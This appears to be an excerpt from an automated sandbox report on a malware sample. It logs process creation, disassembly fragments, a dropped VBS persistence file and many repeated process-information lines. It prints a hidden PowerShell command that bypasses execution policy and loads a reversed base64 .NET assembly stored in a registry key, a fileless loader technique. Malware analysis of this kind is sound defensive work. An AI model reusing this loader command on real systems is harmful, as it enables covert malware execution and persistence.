Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B31D0 push eax; ret	13_2_009B31D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1900 push ss; ret	13_2_009B1902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C1946 push ebp; iretd	13_2_009C1947
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B5172 push ss; ret	13_2_009B5174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B8208 push eax; retf	13_2_009B820B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C8238 push ebx; retf	13_2_009C823E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C73FA push 36BCB849h; ret	13_2_009C7406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C43E1 push cs; iretd	13_2_009C43EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C7407 push 36BCB849h; ret	13_2_009C7405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1D8F push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1DF3 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1DF1 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1DE2 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1DE4 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1D77 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1EDA push ebp; ret	13_2_009B1EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1E14 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1E02 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B1E00 push ss; ret	13_2_009B1D8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C3FFA push ebp; ret	13_2_009C4005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053609AD push ecx; mov dword ptr [esp], ecx	13_2_053609B6
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F43455 push ebp; ret	17_2_04F43460
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F455D2 push esi; iretd	17_2_04F455D3
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F345CD push ss; ret	17_2_04F345CF
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F40DA1 push ebp; iretd	17_2_04F40DA2
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F47693 push ebx; retf	17_2_04F47699
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F37663 push eax; retf	17_2_04F37666
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F46862 push 36BCB849h; ret	17_2_04F46860
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F46855 push 36BCB849h; ret	17_2_04F46861
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F4383C push cs; iretd	17_2_04F4384A
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F45167 push ebp; ret	17_2_04F45168

Persistence and Installation Behavior

Windows Shell Script Host drops VBS files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\LKeZAYNmpVLnixJ.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
